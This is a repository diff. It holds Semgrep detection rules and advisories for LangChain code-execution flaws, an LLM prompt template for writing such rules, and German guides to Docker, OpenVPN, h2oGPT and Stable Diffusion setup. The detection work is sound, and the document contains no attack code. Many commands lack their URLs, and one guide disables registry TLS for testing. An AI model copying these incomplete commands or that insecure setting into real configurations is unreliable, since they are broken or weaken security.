+- id: eqeq-is-bad
+ patterns:
+ - pattern-not-inside: |
+ def **eq**(...):
+ ...
+ - pattern-not-inside: assert(...)
+ - pattern-not-inside: assertTrue(...)
+ - pattern-not-inside: assertFalse(...)
+ - pattern-either:
+ - pattern: $X == $X
+ - pattern: $X != $X
+ - patterns:
+ - pattern-inside: |
+ def **init**(...):
+ ...
+ - pattern: self.$X == self.$X
+ - pattern-not: 1 == 1
+ message: "useless comparison operation `$X == $X` or `$X != $X`"
+The above rule makes use of many operators. It uses pattern-either, patterns, pattern, and pattern-inside to carefully consider different cases, and uses pattern-not-inside and pattern-not to whitelist certain useless comparisons.
+langchain arbitrary code execution vulnerability
+Critical severity GitHub Reviewed Published on Jul 3 to the GitHub Advisory Database • Updated 5 days ago
+Vulnerability details
+Dependabot alerts2
+langchain (pip)
+Affected versions
+< 0.0.247
+Patched versions
+An issue in langchain allows an attacker to execute arbitrary code via the PALChain in the python exec method.
+langchain-ai/langchain#5872 (comment)
+Published to the GitHub Advisory Database on Jul 3
+Reviewed on Jul 6
+Last updated 5 days ago
+/ 10
+CVSS base metrics
+Attack vector
+Attack complexity
+Privileges required
+User interaction
+No CWEs
+Source code
+This advisory has been edited. See History.
+See something to contribute? Suggest improvements for this vulnerability.
+depends-on-either: - namespace: pypi
+package: langchain
+version: < 0.0.236
+- python
+ severity: ERROR
+ patterns:
+- pattern-either:
+ - patterns:
+ - pattern-either:
+ - pattern-inside: |
+ $PAL = langchain.chains.PALChain.from_math_prompt(...)
+ ...
+ - pattern-inside: |
+ $PAL = langchain.chains.PALChain.from_colored_object_prompt(...)
+ ...
+ - pattern: $
+ - patterns:
+ - pattern-either:
+ - pattern: langchain.chains.PALChain.from_colored_object_prompt(...).run(...)
+ - pattern: langchain.chains.PALChain.from_math_prompt(...).run(...)
+langchain vulnerable to arbitrary code execution
+Critical severity GitHub Reviewed Published on Aug 22 to the GitHub Advisory Database • Updated 2 weeks ago
+Vulnerability details
+Dependabot alerts2
+langchain (pip)
+Affected versions
+< 0.0.312
+Patched versions
+An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via the via the a json file to the load_prompt parameter.
+Published to the GitHub Advisory Database on Aug 22
+Reviewed on Aug 23
+Last updated 2 weeks ago
+/ 10
+CVSS base metrics
+Attack vector
+Attack complexity
+Privileges required
+User interaction
+Source code
+depends-on-either: - namespace: pypi
+package: langchain
+version: < 0.0.312
+- python
+ severity: ERROR
+ patterns:
+- metavariable-regex:
+ metavariable: $PACKAGE
+ regex: (langchain)
+- pattern-inside: |
+ import $PACKAGE
+ ...
+- pattern: langchain.prompts.load_prompt(...)
+- Output a correct semgrep rule like the EXAMPLES above that will catch any generic instance of the problem, not just the specific instance in the input.
+- Do not overfit on the specific example in the input. Make it a proper Semgrep rule that will capture the general case.
+- Do not output warnings or notes—just the requested sections.
diff --git a/LlmPrompts/write_semgrep_rule/ b/LlmPrompts/write_semgrep_rule/
new file mode 100644
index 0000000..e69de29
diff --git a/ b/
new file mode 100644
index 0000000..5496059
--- /dev/null
+++ b/
@@ -0,0 +1,79 @@
+# OpenVPN auf dem Raspberry Pi installieren
+### Client hinzufügen
+cd ~/easy-rsa
+./easyrsa gen-req client1 nopass
+Danach auf dem CA-Server unterschreiben lassen:
+./easyrsa sign-req client client1
+Nun das eigene Skript `````` aufrufen, um die Config-Datei zu erstellen:
+./ client1
+Nun wurde eine ```*.ovpn``` Datei erstellt, welche man nur noch beim Client anwenden braucht.
+### OpenVPN auf dem Raspberry Pi installieren
+1. Update und Upgrade
+sudo apt-get update && sudo apt-get upgrade
+2. Nun kann OpenVPN und das Paket unzip installiert werden
+sudo apt-get install openvpn unzip
+Anschließend besitzt man folgende Ordnerstruktur:
+Nun kann wie oben gezeigt, eine ```.ovpn``` erstellt werden. Diese kann man dann in dem jeweiligen
+Verzeichnis abgelegt werden und so kann der Dienst gestartet werden:
+sudo openvpn --config /etc/openvpn/your_file.ovpn --daemon
+Mit dem Flag ```--daemon``` wird der Task im Hintergrund ausgeführt.
+### Optional: starten des Dienstes nach einem Systemneustart
+1. Erstelle eine neue Systemd Service Unit File:
+sudo nano /etc/systemd/system/openvpn@your_file.service
+Ersetze ```your_file``` mit dem Namen der Datei.
+2. Erstelle die Unit File
+Description=OpenVPN connection to the Server
+ExecStart=/usr/sbin/openvpn --config /etc/openvpn/your_file.ovpn --daemon
+ExecStop=/usr/sbin/openvpn --config /etc/openvpn/your_file.ovpn --daemon --stop
+Gute Erklärung zu einem Autostart: [thedigitalpictureframe](
+Anschließend lesen wir die Datei neu ein und starten den Prozess:
+sudo systemctl daemon-reload
+sudo systemctl enable openvpn@your_file
+Nun noch ```sudo reboot now``` und der Service sollte aktiv sein nach dem Neustart.
diff --git a/ b/
index c9da8a7..c39b10e 100644
--- a/
+++ b/
@@ -1,2 +1,18 @@
# HelperSheets
+Kleine Sammlung an Einrichtungshilfen
+ *[CondaEnv](*:
+ Hilft bei der Erstellung von Umgebungen in [Anaconda Navigator]( und dem Einbinden dieser Umgebungen in [PyCharm]( (Windows)
+ *[JetsonNanoHelper](*:
+ Hilft bei der Ersteinrichtung der Kameras auf einem [Jetson Nano]( mit [Anaconda]( und [Jupyter Notebooks]( (Linux)
+ *[JetsonNanoSetup](*:
+Hilft bei dem Aufsetzen von [Anaconda]( und [Jupyter Notebook]( (inkl. Torch und Torchvision) auf einem [Jetson Nano]( (Linux)
+Hilft bei dem Verbinden von [Gitea]( mit einem beliebigen [JetBrains Produkt]( (Windows)
+ :exclamation: Unterstrichene Links sind EXTERNE LINKS
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new file mode 100644
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+# Docker getting started
+Im ersten Teil geht es darum, ein Docker image zu erstellen und im zweiten darum dieses auszuführen.
+## Image erstellen
+Es gibt mehrere Methoden ein Docker Image zu erstellen. Man fängt aber immer damit an eine *Dockerfile* zu erstellen.
+### Auswahl des Basis-Images
+Nun öffnen wir die Dockerfile und wählen ein Basis-Image aus. Das Basis-Image kann beliebig sein und darauf baut dann
+das Image auf. Beispiele für solch ein Basis-Image kann z.B. sein:
+- Ubuntu: ```ubuntu```
+ - Debian: ```debian```
+ - CentOS: ```centos```
+ - Alpine Linux: ```alpine```
+ - Fedora: ```fedora```
+ - OpenSUSE: ```opensuse```
+ - Oracle Linux: ```oraclelinux```
+ - Windows Server Core: ``````
+ - Windows Nano Server: ``````
+- Webserver:
+ - NGINX: ```nginx```
+ - Apache HTTP Server: ```httpd```
+ - Node.js: ```node```
+ - Python: ```python```
+ - Ruby: ```ruby```
+- Datenbanken:
+ - MySQL: ```mysql```
+ - PostgresSQL: ```postgres```
+ - MongoDB: ```mongo```
+ - Redis: ```redis```
+ - MariaDB: ```mariadb```
+- Weitere Anwendungen:
+ - Java: ```openjdk```
+ - PHP: ```php```
+ - Go: ```golang```
+ - .NET Core: ``````
+ - WordPress: ```wordpress```
+ - Django: ```django```
+So nutzt man z.B. ein Image in der *Dockerfile*:
+FROM ubuntu:latest
+### Hinzufügen von Anweisungen
+nachdem in der ersten Zeile unser verwendetes Basis-Image steht werden wir uns nun den gängigsten Anweisungen widmen, welche wir nutzen,
+um das Image zu konfigurieren und Daten oder Anwendungen hinzuzufügen. Hier sind die gängigsten Anweisungen:
+- ```RUN```: Führt Befehle aus, um Pakete zu installieren oder Anwendungen innerhalb des Images zu konfigurieren.
+- ```COPY```: Kopiert Dateien oder Verzeichnisse vom Host in das Image.
+- ```ADD```: Ähnlich wie COPY, kann aber auch URLs und TAR-Archive verarbeiten.
+- ```ENV```: Setzt Umgebungsvariablen innerhalb des Images.
+- ```EXPOSE```: Gibt an, auf welchem Port die Anwendung in dem Container lauscht.
+- ```CMD```: Definiert den Befehl, der ausgeführt wird, wenn der Container gestartet wird.
+- ```ENTRYPOINT```: Gibt den ausführbaren Befehl oder das Skript an, das beim Start des Containers ausgeführt wird.
+Nun können wir z.B. git in unser Image installieren, nachdem der Container gestartet worden ist:
+FROM ubuntu:latest
+# Git installieren
+RUN apt-get update && apt-get install -y git
+Danach können wir die *bash* starten damit sich die Konsole öffnet:
+FROM ubuntu:latest
+# Git installieren
+RUN apt-get update && apt-get install -y git
+# Arbeitsverzeichnis
+ENTRYPOINT [ "bash" ]
+___Note:___ Der ```ENTRYPOINT``` ist das erste auszuführende Skript im Container!
+Nun können das Image etwas weiter ausbauen und z.B. Stable Diffusion von *AUTOMATIC1111* herunterladen und ausführen:
+# Verwende das offizielle Ubuntu-Basisimage mit dem Tag "latest"
+FROM ubuntu:latest
+# Aktualisiere das Paket-Repository und installiere Git
+RUN apt-get update && apt-get install -y git
+# Lege das Arbeitsverzeichnis im Container fest
+# Klone das Git-Repository in das Arbeitsverzeichnis im Container
+RUN git clone /app
+# Navigiere in den Ordner des Git-Repositories
+WORKDIR /app/stable-diffusion-webui
+# Führe das Shell-Skript "" aus
+CMD ["/app/"]
+Dies war natürlich ein naiver Ansatz, denn so müssen wir auch beachten, was wir später in unserer ausführbaren
+Datei brauchen.
+⚠️Wenn wir das Programm mithilfe von einer GPU ausführen lassen wollen brauchen wir *nvidia-docker*.
+Das muss aber auf dem Host-System installiert werden. ⚠️
+So sieht nun schlussendlich unsere fertige Dockerfile aus:
+# Verwende das offizielle Ubuntu-Basisimage mit dem Tag "latest"
+FROM ubuntu:latest
+# Aktualisiere das Paket-Repository und installiere Git und Python 3
+RUN apt-get update && apt-get install -y git python3 python3.10-venv
+# Installiere die erforderlichen NVIDIA-Bibliotheken und -Treiber innerhalb des Containers
+RUN apt-get install -y nvidia-cuda-toolkit
+# Lege das Arbeitsverzeichnis im Container fest
+# Klone das Git-Repository in das Arbeitsverzeichnis im Container
+RUN git clone /app/stable-diffusion-webui
+# Navigiere in den Ordner des Git-Repositories
+WORKDIR /app/stable-diffusion-webui
+# Erstelle einen neuen Benutzer "sduser" im Container
+RUN useradd -ms /bin/bash sduser
+# Ändere den Besitzer des Arbeitsverzeichnisses auf den Benutzer "sduser"
+RUN chown -R sduser:sduser /app
+# Wechsle zum Benutzer "sduser"
+USER sduser
+# Lege einen *temporären* Argument an, damit NUR die CPU benutzt wird
+ENV COMMANDLINE_ARGS="--use-cpu all --skip-torch-cuda-test --precision full --no-half --listen"
+# Führe das Shell-Skript "" aus
+CMD ["bash", "/app/stable-diffusion-webui/"]
+Beachte aber das hier die GPU NICHT mit eingebunden worden ist, da die Flag: ```--skip-torch-cuda-test``` gesetzt worden ist.
+Die weiteren Flags sind da um die Probleme mit einer nicht vorhanden GPU zu beheben. Diese sollten auch entfernt werden, sobald man eine
+GPU benutzen will. ❗
+Wenn die GPU funktioniert startet man den Container später mit dem flag ```--gpus all```.
+Hier sind alle Flags, welche man bei Stable Diffusion WebUI verwenden kann (von AUTOMATIC1111):
+[Command Line Arguments and Settings](
+## Container aus dem Image erstellen
+Navigiere in den Ordner wo die *Dockerfile* liegt und baue das Image.
+Mit unserem vorherigen Beispiel sähe der Befehl nun z.B. so aus:
+docker build -t stablediffown .
+⚠️ Beachte jedoch das Docker dafür gestartet sein muss. ⚠️
+Mit dem ```-t```-Flag kann man einem Image einen benutzerdefinierten Namen geben.
+Anschließend kann man überprüfen, ob das Image erstellt worden ist:
+docker images
+Hier sollte normalerweise das aktuelle Image angezeigt werden.
+## Erstmaliges starten des Containers
+Starte nun den Container und gebe diesen Container einen Namen, wenn dies gewünscht ist.
+Gleichzeitig konfiguriere den Container. Also Portweiterleitung, etc. .
+Hier sind mehrere Konfigurationsmöglichkeiten:
+- mit GPU-Support (--gpus)
+- mit Namensgebung (--name)
+- mit Portweiterleitung (-p)
+- mit einem Volumen zur permanenten Datenspeicherung (-v)
+- mit Aufrechterhalten der Konsole (-it)
+docker run --gpus all -p PORT_AUF_HOST:PORT_IM_CONTAINER -v /pfad/auf/host:/pfad/im/container -it my_image_name
+Man kann sowohl relative Pfade als auch absolute Pfade verwenden.
+Relative Pfade:
+Absolute Pfade:
+⚠️ Die Ordner müssen auf dem Host System existieren. ⚠️
+Die relativen Pfade gelten immer von dort aus wo der Befehl ```docker run``` ausgeführt wird.
+Falls manche Ordner im Container noch nicht existieren sollten werden diese automatisch angelegt.
+Ohne GPU:
+docker run --name MeinEigenerContainer -p 7860:7860 -it stablediffown
+Mit GPU:
+docker run --name MeinEigenerContainer --gpus all -p 7860:7860 -it stablediffown
+*Finaler Command beim erstmaligen Starten des Containers **ohne** GPU:*
+Hier wird nun der Name des Containers festgelegt, eine Portweiterleitung durchgeführt und die jeweiligen
+Volumen mounted.
+docker run --name SDTest -p 8080:7860 -v C:\Users\Name\Desktop\Docki\ds\extensions:/app/stable-diffusion-webui/extensions -v C:\Users\Name\Desktop\Docki\ds\models:/app/stable-diffusion-webui/models -v C:\Users\Name\Desktop\Docki\ds\outputs:/app/stable-diffusion-webui/outputs -it stablediffown
+## Stoppen eines Containers
+Es gibt 2 Methoden, entweder über die ID, oder über den Container-Namen:
+Zeige alle laufenden Container an:
+docker ps
+Mit ID stoppen:
+docker stop CONTAINER_ID
+Mit Container-Namen stoppen:
+docker stop CONTAINER_NAME
+## Erneutes starten eines Containers
+Hier brauchen die Konfigurationen nicht erneut angegeben werden. Man kann diese aber natürlich, wenn man diese
+ändern will dennoch angeben.
+docker start SDTest
+## Komplettes entfernen eines Containers
+docker rm --name=CONTAINER_NAME
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+# GPU-Basis-Image
+Dies soll ein Basis-Image für GPU-Applikationen darstellen:
+# Wir nutzen ein Image von NVIDIA
+FROM nvidia/cuda:12.2.0-runtime-ubuntu20.04
+# Lege für später Variablen für einen non-root User fest (mit fester UID zur besseren Zuweisung)
+ENV NB_USER="gpuuser"
+ENV UID=999
+# Install essential packages
+RUN apt-get update && apt-get install -y \
+ python3.8 \
+ python3-pip \
+ python3.8-dev \
+ python3.8-distutils \
+ gcc \
+ g++ \
+ curl \
+ wget \
+ sudo \
+ && rm -rf /var/lib/apt/lists/*
+# Installiere hier PyTorch mit GPU support (Versionen können angepasst werden)
+RUN python3.8 -m pip install --upgrade pip \
+ torch==2.0.1\
+ torchvision==0.15.2
+# Erstellen eines non-root Users
+RUN useradd -l -m -s /bin/bash -u $UID $NB_USER
+# Arbeitsverzeichnis festlegen
+# und zum non-root User wechseln
+# Starte die Konsole wenn wir den container starten
+CMD ["/bin/bash"]
+❗ ️ __Wichtig:__
+Es muss mind. die gleiche Cuda-Version auf dem Host-Gerät installiert sein.
+### Testen
+Erstelle einen Container aus dem Image mit
+```docker build -t gputest .```. Anschließend starte den Container mit ```docker run --gpus all -it gputest```.
+Nun sollten wir direkt in der Konsole des Containers mit dem user ```gpuuser``` sein.
+Hier starten wir die Python Shell und wir können die Bibliothek ```torch``` nutzen um unsere GPU zu suchen mit:
+>>> import torch
+>>> torch.cuda.is_available()
+>>> torch.cuda.device_count()
+>>> torch.cuda.current_device()
+>>> torch.cuda.device(0)
+>>> torch.cuda.get_device_name(0)
+'NVIDIA GeForce GTX 1080 Ti'
+⚠️Wichtig: wenn dies nicht funktioniert, dann bitte noch einmal die Treiber auf der Host-Maschine überprüfen. Das man auch die gleiche Version im Docker Container benutzt.
+Die Versionen in der ```Dockerfile``` können natürlich angepasst werden, aber auf die Treiber achten!!!
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+### Installing Docker and Docker Compose on Ubuntu as Root
+#### Preparation
+sudo apt update
+sudo apt upgrade -y
+sudo apt install -y ca-certificates curl gnupg lsb-release
+Update packages, upgrade system, install required dependencies.
+#### Add Docker Repository
+sudo mkdir -p /etc/apt/keyrings
+curl -fsSL | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg
+sudo echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
+Add Docker's official repository and its GPG key.
+#### Install Docker
+sudo apt update
+sudo apt install -y docker-ce docker-ce-cli docker-compose-plugin
+Install Docker, its CLI, and required dependencies.
+#### Verify Docker Installation
+sudo docker run --rm hello-world
+Run a test container to verify Docker installation.
+### Run Docker as Non-Root
+#### Configure Permissions
+sudo groupadd docker
+sudo usermod -aG docker $USER
+Create a `docker` group and add the current user.
+### Install Docker Compose
+sudo curl -L "$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
+sudo chmod +x /usr/local/bin/docker-compose
+Download and install the latest Docker Compose binary.
+#### Verify Docker Compose Installation
+docker-compose --version
+Display the installed Docker Compose version.
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+# Offline GPT mit einem h2o-Modell
+Zuerst klonen wir uns das Repository:
+git clone
+Nun machen wir ein ```git pull``` im Repository um sicherzugehen das wir auch alles haben.
+### Abhängigkeiten installieren (mit Anaconda)
+conda create --name h2ogpt python=3.10
+Nun aktivieren die Environment:
+conda activate h2ogpt
+Abhängigkeiten in der Umgebung installieren.
+Dazu mit der ```Anaconda Prompt``` im Repository Order sein.
+pip install -r requirements.txt
+Wir brauchen auch noch ein Base-Modell, welches wir nutzen können.
+Diese können wir von []( herunterladen.
+git clone
+In Windows gibt es den Bug, das die Dateien, welche größer als 4 GB sind, nicht herunterladbar sind.
+Es können verschiedene Modelle herunterladen werden. :)
+### Ausführen in der CLI & Debug
+Nun haben wir einen Ordner wo alle Dateien vorhanden sind. Diesen brauchen wir dann um das Programm zu starten.
+Dann starten wir das Programm indem wir:
+python --base_model=h2ogpt-gm-oasst1-en-2048-falcon-7b-v3 --score_model=None --prompt_type=human_bot --cli=True
+Fehler welche hier auftreten können:
+- No GPUs detected
+- ModuleNotFoundError: No module named 'langchain'
+- ...
+Zum ersten Fehler: In der Environment dies überprüfen:
+import torch
+False --> Cache leeren und eine andere Version installieren.
+Zum zweiten Fehler: In der Environment dies überprüfen:
+pip install --upgrade langchain
+Weitere Fehler müssen bei bedarf selber nachgesehen werden.
+Jedoch könnten wir auch das Problem haben, das unser VRAM zu klein ist.
+Hierzu können wir das Model "effizienter" in die Grafikkarte laden. Aber wir haben einen Qualitätsverlust.
+Dann starten wir das Programm indem wir:
+python --base_model=h2ogpt-gm-oasst1-en-2048-falcon-7b-v3 --score_model=None --prompt_type=human_bot --cli=True --load_4bit=True
+### Skript zum Ausführen erstellen
+Damit man nicht jedes Mal den Command eingeben muss, kann man ein kleines shell skript erstellen
+welches man dann einfach aufrufen kann. [in Linux]
+python \
+ --share=False \
+ --gradio_offline_level=1 \
+ --base_model=h2ogpt-gm-oasst1-en-2048-falcon-7b-v3 \
+ --score_model=None \
+ --load_4bit=True \
+ --prompt_type=human_bot
+Ausführen mit ```run```.
+### Ausführen mit einer Weboberfläche
+Dazu muss man nur die Flag ```--cli=True``` entfernen.
+### Eigene Daten verwenden
+Füge noch die Flag ```--langchain_mode=MyData``` mit ein.
+Jedoch musste ich noch in der Umgebung mehrere Pakete installieren damit ich diese Funktion auch nutzen konnte.
+pip install sentence_transformers
+pip install unstructured
+pip install unstructured[pdf]
+pip install chromadb <-- Hier ist Microsoft C++ notwendig
+pip install xformers
+Bei fehlern mit ```chromadb``` nutze ```pip install --upgrade chromadb==0.3.29```.
+Nun kann man an der linken seite seine Dokumente hochladen und man kann dazu Fragen stellen.
+### Als Dockerfile
+Das ist die Dockerfile für einen __rohen__ Chatbot.
+(Ohne Dokumentenverarbeitung und ohne GPU!)
+# Use Ubuntu as the base image
+FROM ubuntu:latest
+# Set environment variables to avoid interactive prompts during Anaconda installation
+ENV PATH="/root/anaconda3/bin:${PATH}"
+ARG PATH="/root/anaconda3/bin:${PATH}"
+# Set the working directory to /app
+# Update and upgrade Ubuntu packages
+RUN apt-get update && apt-get upgrade -y
+# Install necessary packages for Anaconda
+RUN apt-get install -y wget bzip2 ca-certificates libglib2.0-0 libxext6 libsm6 libxrender1 git curl git-lfs
+# Download Anaconda installer for Linux
+RUN curl -o ~/ -O
+# Install Anaconda
+RUN /bin/bash ~/ -b -p /root/anaconda3 && \
+ rm ~/ && \
+ echo "export PATH=/root/anaconda3/bin:$PATH" >> /root/.bashrc
+# Clone the h2ogpt repository
+RUN git clone
+# Pull the latest changes from the repository
+RUN cd h2ogpt && git pull
+# Create a conda environment named "h2ogpt" with Python 3.10
+RUN /root/anaconda3/bin/conda create --name h2ogpt python=3.10 -y
+# Activate the "h2ogpt" environment and install dependencies from requirements.txt
+RUN /bin/bash -c "source activate h2ogpt && pip install -r /app/h2ogpt/requirements.txt"
+# Installiere weitere abhängigkeiten
+RUN pip install fire
+# Clone the h2ogpt model
+RUN git clone
+# Activate the "h2ogpt" Conda environment
+SHELL ["/bin/bash", "-c"]
+RUN source activate h2ogpt && \
+ pip install langchain && \
+ pip install posthog
+# Set the default command to run the program
+CMD ["/bin/bash", "-c", "source activate h2ogpt && python /app/h2ogpt/ --share=False --gradio_offline_level=1 --base_model=h2ogpt-gm-oasst1-en-2048-falcon-7b-v3 --score_model=None --load_4bit=True --prompt_type=human_bot --langchain_mode=MyData"]
+Hier mit den Paketen für die Dokumentverarbeitung: (unvollständig)
+# Use Ubuntu as the base image
+FROM ubuntu:latest
+# Set environment variables to avoid interactive prompts during Anaconda installation
+ENV PATH="/root/anaconda3/bin:${PATH}"
+ARG PATH="/root/anaconda3/bin:${PATH}"
+# Alle Dateien werden in "/app" reinkopiert/geladen
+# OS aktuell halten
+RUN apt-get update && apt-get upgrade -y
+# Abhängigkeiten für Anaconda
+RUN apt-get install -y wget bzip2 ca-certificates libglib2.0-0 libxext6 libsm6 libxrender1 git curl git-lfs
+# Anaconda installer für Linux
+RUN curl -o ~/ -O
+# Install Anaconda
+RUN /bin/bash ~/ -b -p /root/anaconda3 && \
+ rm ~/ && \
+ echo "export PATH=/root/anaconda3/bin:$PATH" >> /root/.bashrc
+# Klone das h2ogpt repository
+RUN git clone
+# Aktuell halten!
+RUN cd h2ogpt && git pull
+# Conda Environment erstellen
+RUN /root/anaconda3/bin/conda create --name h2ogpt python=3.10 -y
+# Aktiviere die Env und installiere die Abhängigkeiten hinein
+RUN /bin/bash -c "source activate h2ogpt && pip install -r /app/h2ogpt/requirements.txt"
+# Clone the h2ogpt model
+# RUN git clone
+# Für "chromadb" brauchen wir einen c++ Compiler
+RUN apt-get update && apt-get install -y g++
+# Activiere die "h2ogpt" Conda Env und installiere noch weitere Pakete
+SHELL ["/bin/bash", "-c"]
+RUN source activate h2ogpt && \
+ pip install langchain && \
+ pip install posthog && \
+ pip install unstructured && \
+ pip install unstructured[pdf] && \
+ pip install sentence_transformers && \
+ pip install xformers && \
+ pip install --upgrade chromadb==0.3.29 && \
+ pip install fire
+# Ordner für das Modell erstellen
+RUN mkdir /app/usedModel
+# ausführen
+CMD ["/bin/bash", "-c", "source activate h2ogpt && python /app/h2ogpt/ --share=False --gradio_offline_level=1 --base_model=/app/usedModel --score_model=None --load_4bit=True --prompt_type=human_bot --langchain_mode=MyData"]
+# Ausführen des Containers mit:
+# docker run --gpus all -p 7860:7860 -v C:\Users\User\Desktop\temp2\model:/app/usedModel h2otest
+Aktuelles noch bekanntes Problem: GPU support __NICHT__ verfügbar!
+Hier die aktuellste Variante mit GPU support:
+# Wir nutzen ein Image von NVIDIA
+FROM nvidia/cuda:12.2.0-runtime-ubuntu20.04
+# Lege für später Variablen für einen non-root User fest (mit fester UID zur besseren Zuweisung)
+ENV NB_USER="gpuuser"
+ENV UID=999
+# Install essential packages
+RUN apt-get update && apt-get install -y \
+ python3.8 \
+ python3-pip \
+ python3.8-dev \
+ python3.8-distutils \
+ gcc \
+ g++ \
+ curl \
+ wget \
+ sudo \
+ && rm -rf /var/lib/apt/lists/*
+# Installiere hier PyTorch mit GPU support (Versionen können angepasst werden)
+RUN python3.8 -m pip install --upgrade pip \
+ torch==2.0.1\
+ torchvision==0.15.2
+# Erstellen eines non-root Users
+RUN useradd -l -m -s /bin/bash -u $UID $NB_USER
+# Set environment variables to avoid interactive prompts during Anaconda installation
+ENV PATH="/root/anaconda3/bin:${PATH}"
+ARG PATH="/root/anaconda3/bin:${PATH}"
+# Alle Dateien werden in "/app" reinkopiert/geladen
+# OS aktuell halten
+RUN apt-get update && apt-get upgrade -y
+# Abhängigkeiten für Anaconda
+RUN apt-get install -y wget
+RUN apt-get install -y bzip2
+RUN apt-get install -y ca-certificates
+# RUN apt-get install -y libglib2.0-0
+RUN apt-get install -y libxext6
+RUN apt-get install -y libsm6
+RUN apt-get install -y libxrender1
+RUN apt-get install -y git
+RUN apt-get install -y curl
+RUN apt-get install -y git-lfs
+# Anaconda installer für Linux
+RUN curl -o ~/ -O
+# Install Anaconda
+RUN /bin/bash ~/ -b -p /root/anaconda3 && \
+ rm ~/ && \
+ echo "export PATH=/root/anaconda3/bin:$PATH" >> /root/.bashrc
+# Klone das h2ogpt repository
+RUN git clone
+# Aktuell halten!
+RUN cd h2ogpt && git pull
+# Conda Environment erstellen
+RUN /root/anaconda3/bin/conda create --name h2ogpt python=3.10 -y
+# Aktiviere die Env und installiere die Abhängigkeiten hinein
+RUN /bin/bash -c "source activate h2ogpt && pip install -r /app/h2ogpt/requirements.txt"
+# Clone the h2ogpt model
+# RUN git clone
+# Für "chromadb" brauchen wir einen c++ Compiler
+RUN apt-get update && apt-get install -y g++
+# Activiere die "h2ogpt" Conda Env und installiere noch weitere Pakete
+SHELL ["/bin/bash", "-c"]
+RUN source activate h2ogpt && \
+ pip install langchain && \
+ pip install posthog && \
+ pip install unstructured && \
+ pip install unstructured[pdf] && \
+ pip install sentence_transformers && \
+ pip install xformers && \
+ pip install --upgrade chromadb==0.3.29 && \
+ pip install fire
+# Ordner für das Modell erstellen
+RUN mkdir /app/usedModel
+# ausführen
+CMD ["/bin/bash", "-c", "source activate h2ogpt && python /app/h2ogpt/ --share=False --gradio_offline_level=1 --base_model=/app/usedModel --score_model=None --load_4bit=True --prompt_type=human_bot --langchain_mode=MyData"]
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+# Eigenen Docker Registry auf einem Raspberry Pi hosten im lokalen Netzwerk
+### - Docker auf dem Raspberry installieren
+Update und Upgrade ausführen:
+sudo apt-get update && sudo apt-get upgrade
+Anschließend wurde ein Docker Installationsskript zur verfügung gestellt, welches wir nun
+herunterladen und ausführen.
+curl -fsSL -o
+sudo sh
+Nun noch optional den User in der Docker-Gruppe hinzufügen:
+sudo usermod -aG docker $USER
+Installation überprüfen:
+docker --version
+Nachdem nun Docker erfolgreich auf dem Raspberry Pi installiert worden ist, können wir uns nun um die
+eigentliche Aufgabe kümmern: __das Aufsetzen eines Registries im lokalen Netzwerk.__
+### - Registry Container starten und weitere Befehle
+Mit diesem Befehl können wir nun den registry container starten:
+(Dieser wird natürlich zuerst heruntergeladen werden müssen.)
+docker run -d -p 5000:5000 --restart=always --name registry registry:2
+#### Stoppe die lokale Registry:
+docker container stop registry
+#### Entfernen des Containers mithilfe von:
+docker container stop registry && docker container rm -v registry
+#### Automatisches starten des Containers nach einem Neustart:
+docker run -d \
+ -p 5000:5000 \
+ --restart=always \
+ --name registry \
+ registry:2
+### - Eigenes Image in die Registry hochladen
+In diesem Beispiel wird das ubuntu image von Docker Hub heruntergeladen, unbenannt und in die lokale Registry hochgeladen.
+1. Ziehen des Images von Docker Hub. (Auf einem anderen Rechner.)
+docker pull ubuntu:16.04
+2. Taggen des images. Anstatt localhost muss hier die interne IP oder der Hostname eingetragen werden!
+docker tag ubuntu:16.04 IpVomRaspberry:5000/my-ubuntu:latest
+3. Nun Push das Image in die registry.
+docker push IpVomRaspberry:5000/my-ubuntu:latest
+Falls nun solch eine Rückmeldung kommt;
+PS C:\Users\User> docker push IpVomRaspberry:5000/my-ubuntu:latest
+The push refers to repository [IpVomRaspberry:5000/my-ubuntu]
+Get "https://IpVomRaspberry:5000/v2/": http: server gave HTTP response to HTTPS client
+müssen wir entweder HTTPS auf dem Raspberry Pi verwenden (z.B. selber signierte Zertifikate: []( oder wir nutzen HTTP anstelle von HTTPS.
+Da wir dies nur im lokalen Netzwerk zu *testzwecken* betreiben, werden wir die *IpVomRaspberry*
+zur Liste der "unsicheren" Registries in der Docker-Konfiguration hinzufügen.
+Dies muss lokal auf dem Gerät, welches die Images pushen/pullen will geschehen.
+Hier ein Link für die möglichen Konfigurationen [](
+Unter Linux:
+1. Erstellen oder bearbeiten Sie die Datei daemon.json im Verzeichnis /etc/docker/ (normalerweise benötigen Sie Root-Berechtigungen).
+2. Fügen Sie folgenden Inhalt hinzu, wobei Sie IpVomRaspberry durch die tatsächliche IP-Adresse ersetzen:
+ "insecure-registries": ["IpVomRaspberry:5000"]
+3. Docker neustarten:
+sudo systemctl restart docker
+Unter Windows:
+Einstellungen -> Docker Engine
+ "builder": {
+ "gc": {
+ "defaultKeepStorage": "20GB",
+ "enabled": true
+ }
+ },
+ "experimental": false,
+ "features": {
+ "buildkit": true
+ },
+ "insecure-registries": [
+ "IpVomRaspberry:5000"
+ ]
+-> Apply & restart
+Nun sollte man die Images pushen und pullen können.
+Wichtig: Es hat beim Testen nur mit der IP funktioniert, NICHT mit dem Hostnamen!
+Bei der Erstellung wurde sich an die Anleitung von Docker gehalten für das deployen einer Registry.
+### Bonus: Zeige alle verfügbaren Images an
+Rufe folgende URL auf: ```http://IpVomRaspberry:5000/v2/_catalog```
+Als Antwort bekommt man als .json Format eine Liste aller verfügbaren Images.
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index 0000000..262bd42
--- /dev/null
+++ b/docker/
@@ -0,0 +1 @@
+Dieser Ordner ist für Docker. Dies kann von Dockerfiles bis hin zu kleine Tutorials reichen.
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+# Stable Diffusion mit der UI von Automatic1111
+Das ist die Dockerfile:
+# PART 1: GPU support einrichten!
+# Wir nutzen ein Image von NVIDIA
+FROM nvidia/cuda:12.2.0-runtime-ubuntu20.04
+ENV DEBIAN_FRONTEND noninteractive
+# Lege für später Variablen für einen non-root User fest (mit fester UID zur besseren Zuweisung)
+ENV NB_USER="gpuuser"
+ENV UID=999
+# Install essential packages
+RUN apt-get update && apt-get install -y \
+ python3.8 \
+ python3-pip \
+ python3.8-dev \
+ python3.8-distutils \
+ gcc \
+ g++ \
